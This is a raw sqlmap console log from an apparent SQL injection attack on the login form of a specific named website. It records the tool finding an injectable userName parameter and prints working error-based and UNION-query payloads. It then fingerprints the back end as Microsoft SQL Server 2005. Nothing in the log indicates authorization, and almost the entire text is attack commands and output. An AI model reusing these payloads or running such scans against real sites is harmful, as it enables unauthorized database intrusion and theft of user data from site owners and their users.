C:\Python27\SqlMap>sqlmap.py -u "http://www.flcit.com/Login!showLogin.do" --form
s
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-20150313}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 10:24:28
[10:24:28] [INFO] testing connection to the target URL
[10:24:28] [INFO] searching for forms
[#1] form:
POST http://www.flcit.com:80/Login!singleSysChkLogin.do
POST data: loginType=0&userName=&toLogin.x=1&toLogin.y=1&toLogin=%20&password=&r
ememberCookie=0&rememberPwd=1
do you want to test this form? [Y/n/q]
>
Edit POST data [default: loginType=0&userName=&toLogin.x=1&toLogin.y=1&toLogin=%
20&password=&rememberCookie=0&rememberPwd=1] (Warning: blank fields detected):
do you want to fill blank fields with random values? [Y/n]
[10:24:31] [INFO] resuming back-end DBMS 'microsoft sql server'
[10:24:31] [INFO] using 'C:\Users\Administrator\.sqlmap\output\results-03292015_
1024am.csv' as the CSV results file in multiple targets mode
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Parameter: userName (POST)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: loginType=0&userName=nZza' AND 3280=CONVERT(INT,(SELECT CHAR(113) C
HAR(112) CHAR(113) CHAR(112) CHAR(113) (SELECT (CASE WHEN (3280=3280) THEN CHAR(
49) ELSE CHAR(48) END)) CHAR(113) CHAR(98) CHAR(113) CHAR(118) CHAR(113))) AND '
xBqv'='xBqv&toLogin.x=1&toLogin.y=1&toLogin= &password=XHxX&rememberCookie=0&rem
emberPwd=1
Type: UNION query
Title: Generic UNION query (NULL) - 13 columns
Payload: loginType=0&userName=nZza' UNION ALL SELECT NULL,NULL,NULL,NULL,NUL
L,NULL,NULL,CHAR(113) CHAR(112) CHAR(113) CHAR(112) CHAR(113) CHAR(122) CHAR(100
) CHAR(81) CHAR(66) CHAR(75) CHAR(74) CHAR(120) CHAR(105) CHAR(97) CHAR(112) CHA
R(113) CHAR(98) CHAR(113) CHAR(118) CHAR(113),NULL,NULL,NULL,NULL,NULL-- &toLogi
n.x=1&toLogin.y=1&toLogin= &password=XHxX&rememberCookie=0&rememberPwd=1
---
do you want to exploit this SQL injection? [Y/n]
[10:24:33] [INFO] the back-end DBMS is Microsoft SQL Server
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2005
[10:24:33] [INFO] you can find results of scanning in multiple targets mode insi
de the CSV file 'C:\Users\Administrator\.sqlmap\output\results-03292015_1024am.c
sv'
[*] shutting down at 10:24:33